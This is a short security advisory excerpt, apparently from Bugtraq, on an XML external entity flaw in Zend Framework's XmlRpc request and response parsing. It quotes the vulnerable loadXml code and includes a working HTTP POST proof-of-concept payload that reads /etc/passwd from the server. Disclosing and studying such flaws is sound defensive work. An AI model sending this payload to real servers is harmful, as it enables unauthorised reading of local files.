Proof of concept:
-----------------
For example, the loadXml function (Zend\XmlRpc\Request.php and Response.php) fails to disable external entities when parsing XML data. There is no call to the libxml_disable_entity_loader function before initializing the SimpleXMLElement class. Related code excerpt:
public function loadXml($request)
{
if (!is_string($request)) {
$this->_fault = new Zend_XmlRpc_Fault(635);
$this->_fault->setEncoding($this->getEncoding());
return false;
}
try {
$xml = new SimpleXMLElement($request);
} catch (Exception $e) {
// Not valid XML
$this->_fault = new Zend_XmlRpc_Fault(631);
$this->_fault->setEncoding($this->getEncoding());
return false;
}
[...]
}
If a web application uses the Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php) to handle XML-RPC requests, it is possible to disclose arbitrary local files from the remote system. The following HTTP POST request to the vulnerable XmlRpc server application illustrates the exploitation of this vulnerability.
POST /xmlrpc_server.php HTTP/1.1
Host: $host
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall> |
Riferimento : http://seclists.org/bugtraq/2012/Jun/166 (1055)
